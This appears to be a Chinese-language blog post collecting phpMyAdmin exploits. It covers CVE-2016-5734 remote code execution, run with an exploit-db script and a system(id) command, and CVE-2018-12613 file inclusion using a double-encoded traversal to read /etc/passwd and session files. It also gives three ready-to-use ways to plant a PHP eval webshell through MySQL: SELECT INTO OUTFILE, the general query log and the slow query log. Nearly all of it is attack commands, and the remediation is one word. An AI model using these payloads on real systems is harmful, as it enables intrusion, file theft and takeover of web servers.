phpMyAdmin 漏洞小集合
有情有義又是無米之炊,無情無義卻是饕餮盛宴.
遠程代碼執行漏洞(CVE-2016-5734)
- phpMyAdmin是phpMyAdmin團隊開發的一套免費的、基於Web的MySQL數據庫管理工具。該工具能夠創建和刪除數據庫,創建、刪除、修改數據庫表,執行SQL腳本命令等。
主要原因由於將用戶輸入的信息拼接進preg_replace函數第一個參數中,而在PHP5.4.7以前,preg_replace存在漏洞,可以\0進行截斷,並將正則模式修改爲e,進而執行命令。
漏洞版本:
- 1、授權用戶;
2、phpmyadmin4.3.0-4.6.2 ;
3、PHP 4.3.0-5.4.6
漏洞復現:
- 漏洞poc:https://www.exploit-db.com/exploits/40185/
python exp.py -u root -p root -d test -c “system(id)” http://192.168.204.130:8080
![在這裏插入圖片描述]()
遠程文件包含漏洞(CVE-2018-12613)
- phpMyAdmin是phpMyAdmin團隊開發的一套免費的、基於Web的MySQL數據庫管理工具。該工具能夠創建和刪除數據庫,創建、刪除、修改數據庫表,執行SQL腳本命令等。
主要原因在index.php中存在一處文件包含邏輯,
![在這裏插入圖片描述]()
滿足以下5個條件
1、不爲空
2、字符串
3、不以index開頭
4、不在$target_blacklist這個黑名單中
5、Core::checkPageValidity()函數爲TRUE
進而通過二次編碼即可繞過檢查,造成遠程文件包含漏洞。
漏洞版本:
- phpMyAdmin 4.8.0和4.8.1
漏洞復現:
-首先搭建好環境,判斷是否存在漏洞經過二次編碼繞過%253f…/…/…/…/…/etc/passwd
然後在sql語句中執行一些語句記錄到日誌,然後在包含即可
比如select ‘<?php echo `id ?>’;
然後查看cookie構造讀取文件%253f…/…/…/…/…/tmp/sess_250df52a97e85b7ea4cc717946791ea1
後臺getshell方法,主要有三個select into outfile直接寫入、開啓全局日誌getshell、使用慢查詢日誌getshell
1、select into outfile直接寫入
前提需要知道絕對路徑以及secure_file_priv沒有具體值,並且web目錄需要有寫權限能夠使用單引號。
首先查看是否有寫入權限
show global variables like '%secure%';
secure_file_priv爲NULL,表示不可以寫入寫出等。沒有具體值時,表示可以。
然後即可獲取shell
select “<?php @eval($_POST['123']);?>” into outfile(“G://www/1.php”)
2、開啓全局日誌getshell
前提root權限
首先查看是否開啓
show variables like '%general%';
如果沒有開啓,可以set global general_log = on;開啓
然後設置shell地址
set global general_log_file = 'c:/aaa/www/1.php';
然後寫入一句話即可,即可連接
select '<?php eval($_POST[cmd]);?>'
3、使用慢查詢日誌getshell
記錄所有執行時間超過long_query_time秒的所有查詢或者不使用索引的查詢。默認情況下,MySQL數據庫是不開啓慢查詢日誌的,即運行10秒以上的語句是慢查詢語句。
跟上面大體相同
show variables like '%slow%';
set GLOBAL slow_query_log=on;
set global slow_query_log_file = 'c:/aaa/www/1.php';
select '<?php eval($_POST[cmd]);?>' from mysql.db where sleep(10);
漏洞修復:
-
升級級。
餘生很長,請多指教。
![在這裏插入圖片描述]()
